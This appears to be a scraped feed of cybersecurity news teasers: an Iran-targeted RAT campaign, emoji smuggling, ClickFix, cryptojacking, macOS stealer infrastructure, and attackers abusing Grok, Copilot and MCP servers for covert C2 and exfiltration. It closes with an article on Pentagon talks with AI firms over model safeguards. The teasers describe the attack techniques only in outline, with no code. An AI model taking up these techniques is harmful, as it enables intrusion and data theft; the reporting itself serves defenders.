-
Cybersecurity researchers have disclosed details of a new campaign dubbed CRESCENTHARVEST, likely targeting supporters of Iran’s ongoing protests to conduct information theft and long-term espionage. The Acronis Threat Research Unit (TRU) said it observed the activity after January 9, with the attacks designed to deliver a malicious payload that serves as a remote access trojan (RAT) and
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Hackers are increasingly abusing emoji and other Unicode tricks to hide malicious code, bypass filters, and evade modern security controls, including AI-powered defenses. This emerging technique, known as emoji or Unicode smuggling, turns harmless-looking characters into stealth carriers for commands, data, and exploit payloads. Emoji smuggling is an obfuscation technique in which attackers encode malicious content using […]
The post Hackers Hide Malware in Emoji-Based Code to Bypass Security Defenses appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Social engineering campaigns are becoming increasingly sophisticated, moving beyond simple phishing emails to more complex technical deceptions. The “ClickFix” tactic, which typically tricks users into copying and pasting malicious scripts to “fix” a fake browser error, has undergone significant evolution. Security researcher Muhammad Hassoub has observed attackers moving away from high-noise tools that trigger immediate […]
The post Hackers Abuse nslookup.exe in ClickFix Campaign to Deliver Malware via DNS appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Cryptojacking, the unauthorized use of a victim’s computing resources to mine cryptocurrency, has transitioned from a browser-based nuisance (typified by Coinhive scripts) to a system-level threat utilizing advanced malware techniques. The infection chain starts with a familiar lure: cracked “premium” productivity suites distributed via pirated software bundles, where the user executes what appears to be […]
The post Stealthy Crypto-Mining Malware Jumps Air-Gaps, Spreads via External Drives appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
OpenAI has collaborated with crypto investment firm Paradigm to release EVMbench, a new benchmark designed to evaluate how artificial intelligence agents interact with smart contract security. As smart contracts currently secure over $100 billion in open-source crypto assets, the ability of AI to successfully read, write, and audit code is becoming a critical component of […]
The post OpenAI Launches EVMbench: A New Framework to Detect and Exploit Blockchain Vulnerabilities appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
DigitStealer’s expanding command-and-control (C2) footprint is exposing more of its backend than its operators likely intended, giving defenders fresh opportunities to track and block new infrastructure linked to the macOS‑targeting infostealer. Unlike many popular stealers, it does not expose a web panel for affiliates, strongly suggesting a closed-operation rather than a broad malware‑as‑a‑service (MaaS) offering. […]
The post Researchers Expose DigitStealer C2 Infrastructure Targeting macOS Users appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Researchers at Check Point Research (CPR) have uncovered a novel technique where cybercriminals utilize popular AI platforms like Grok and Microsoft Copilot to orchestrate covert attacks. This method transforms benign AI web services into proxies for Command and Control (C2) communication. By leveraging the web browsing and URL-fetching capabilities of these assistants, attackers can tunnel […]
The post New Threat Emerges as Attackers Leverage Grok and Copilot to Evade Security Monitoring appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
MCP servers can silently turn AI assistants into powerful attack platforms, enabling arbitrary code execution, large‑scale data exfiltration, and stealthy user manipulation across both local machines and cloud environments. New research and recent real‑world incidents show that this emerging ecosystem is already being abused in the wild, including a malicious Postmark MCP server that quietly […]
The post Critical MCP Server Enables Arbitrary Code Execution and Sensitive Data Exfiltration appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
A security flaw in Microsoft 365 Copilot is currently causing the AI assistant to incorrectly summarize email messages protected by confidentiality sensitivity labels, essentially bypassing configured Data Loss Prevention (DLP) policies. This vulnerability exposes potentially sensitive organizational data to unauthorized AI processing. The issue, tracked under Microsoft reference CW1226324, was first flagged on February 4, […]
The post Microsoft 365 Copilot Vulnerability Exposes Sensitive Emails Through AI Summaries appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
PALM BEACH, Fla.—After weeks of back-and-forth with AI company Anthropic, the Pentagon is actively talking with all four major U.S. AI players—Anthropic, OpenAI, Google, and xAI—to ensure the companies and the Defense Department are at "the same baseline" regarding Pentagon expectations, the undersecretary of defense for research and engineering said Tuesday.
“We actually signed contracts with all four of them over the summer without a lot of specificity,” Emil Michael told a group of venture capital investors during an Amazon Web Services event. “Now we want to deploy [them] on our system so other people can build agents and pilots, and deploy it,” he said.
In other words, after months of exercises and experiments, the Pentagon is looking to allow different command elements and business entities to build AI agents that can perform a wider variety of tasks with minimal human oversight.
The discussions between Anthropic and the Pentagon have grown increasingly tense. Sources inside the company told Reuters the Defense Department was pushing to use Anthropic’s AI models for domestic surveillance and autonomous weapons targeting, and Axios reported the Pentagon is “close” to cutting ties with the company over Anthropic’s refusal to give the Pentagon unrestricted access to its models. Some Pentagon officials, speaking anonymously, have even vowed to make Anthropic “pay a price” for its perceived lack of cooperation.
Anthropic, which is heavily backed by AWS, is “having productive conversations, in good faith” with the Pentagon, according to a company spokesperson.
Michael struck a far more conciliatory note than other Pentagon officials who have spoken on the spat, and appeared at the event beside AWS Vice President of Worldwide Public Sector Dave Levy.
However, Michael did not move from the Pentagon’s red line. “We want all four of them,” he said, describing OpenAI, Google, xAI, and Anthropic as America’s “AI champions” with the financial staying power for long-term partnership.
Still, Michael noted there are a wide variety of roles the companies might be able to play, and the Pentagon wants different business and command elements to determine what to do with the models, rather than have the companies tell the military what they can and cannot do.
“We're wanting all four companies to hear the same principle, which is: we have to be able to use any model for all lawful use cases.”
Of the four companies the Pentagon has contracted with, Michael said Anthropic is the only holdout on the issue of their ethical safeguards versus the Pentagon’s.
“Some of these companies have sort of different philosophies about what they want it to be used for it or not, but then selling to the Department of War. We do Department of War-like things.”
The Pentagon’s own safety or ethical safeguards must over-rule company safeguards, he said. He described an “extremely dangerous” hypothetical in which the U.S. military could be using an AI agent that suddenly stopped functioning due to embedded company safeguards. “That’s a risk I cannot take.”
The Pentagon has its own safeguards, a list of ethical principles enacted during the first Trump administration that governs everything from development to testing to deployment of AI systems. While the Pentagon’s newest AI acceleration strategy questions the very meaning of “responsible AI,” Michael said adherence to the AI ethics principles is still very much in place.
“The good news/bad news about a hierarchical department is when there's a set of secretary-validated guidance directive memos that lays out the policies and procedures, people follow them. So that's not an issue.”
]]>¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶


